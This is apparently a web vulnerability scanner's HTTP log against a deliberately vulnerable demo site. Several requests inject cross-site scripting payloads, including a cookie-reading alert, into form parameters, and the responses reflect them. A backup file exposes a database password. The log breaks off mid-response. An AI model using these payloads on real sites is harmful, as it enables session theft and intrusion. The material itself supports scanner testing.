GET /join.asp?name=&email=>"><script>alert("XSS")</script>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:31 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>

POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 11 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect cboPage=pc1

HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:18 GMT X-Powered-By: ASP.NET Location: p1.asp Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>

GET /linking/link1/link2/link3/link4/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:28 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>

GET /join.asp?name=&email=&surname=&house=&street=&address2=>"><script>alert('XSS')</script>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:28 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>

POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 11 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect cboPage=pc2

HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:18 GMT X-Powered-By: ASP.NET Location: p2.asp Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>

GET /login/login.asp?Action=Login&UserName=</textarea><script>alert('XSS')</script>&Password=333%2D333%2D3333test@test999.com HTTP/1.0 Referer: http://zero.webappsecurity.com:80/login/login.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:53:59 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 363 Content-Type: text/html Cache-control: private <HTML> <HEAD> <BODY> <h1>Invalid username: </textarea><script>alert('XSS')</script></h1> <form action=login.asp method=get> Please login:<br> Username: <input type=text name=UserName><br> Password: <input type=password name=Password><br> <input type=submit value="Login"><br> <input type=hidden name=Action value="Login"><br> </form> </BODY></HTML>

GET /join.asp?name=&email=&surname=&house=test@<script>alert(document.cookie)</script>.com&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:54:37 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4022 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>

GET /admin/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:33 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>

GET /include/common.inc HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:42:02 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:00 GMT ETag: "be7c48f8a9dc11:8f6" Content-Length: 15 my include file

GET /_vti_log/document.URL; HTTP/1.0 Referer: http://zero.webappsecurity.com:80/_vti_log/ Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:44 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>Click the <a href="javascript:location.reload()"> Refresh</a> button, or try again later.<br> </li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <p> <li>Background:<br> This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p> <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li></p> </ul> </font></td> </tr> </table> </body> </html>

GET /pindex.asp.bak HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:34:52 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:38:17 GMT ETag: "208026c0a8dc11:8f6" Content-Length: 2061 <html> <body> <!-- Hidden Reference comment: should find this file /test/hidden.txt --> This page allows for testing of pareters.<br> <br> The first section shows how a combo box can be used to product optional pages<br> <form action = pcomboindex.asp method=post> <SELECT name=cboPage> <OPTION selected value=pc1>Show Page One</OPTION> <option value=pc2>Show Page Two</option> <option value=pc3>Show page three</option> </select><br> <input type=submit value=Submit> </form><br> <hr> <a href="plink.asp?a=b&c=12">Second section is link that passes parameters to a sub page</a><br> <br> <A href="error.html">My ERROR</A> Third example allows the user to input values and then shows them on the following page<br> <Form action="pformresults.asp" method=post> First Name: <input type=text name=txtFirstName><br> Last Name: <input type=text name=txtLastName><br> <input type=hidden name=txtHidden value="This was hidden from the user"> <input type=hidden name=dbConnectString value="dbCCNumbers;uid=sa;password=scoobydo"> <input type=submit value="Show User Input results"><br> </form><br> <hr> <form action="rootlogin.asp" method=post> User Name:<input type=text name=txtName><br> Pass phrase:<input type=text name=txtPassPhrase><br> <input type=submit value="Login"><br> </form> <br> False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <br> False Keyword that should not be flagged: An error has occurred <br> <br> <br> <A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by SmartChecker</A> <br> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit - Should not be flagged due to not having keyword present</A> <br> <A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by Smartchecker(Note: No HTML present)</A> <br> <A HREF="/linking/index.htm">Several chained directories</A> <br> <A HREF="/cfmerror.html">Cold Fusion Error</A> <br> <A HREF="/admin/help.cgi">Help</A> <br> <A HREF="/aspnet.aspx">ASP.NET file</A> </body> </html>

GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=1"style="background:url(javascript:alert('XSS'))"%20"&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:26 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4025 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home 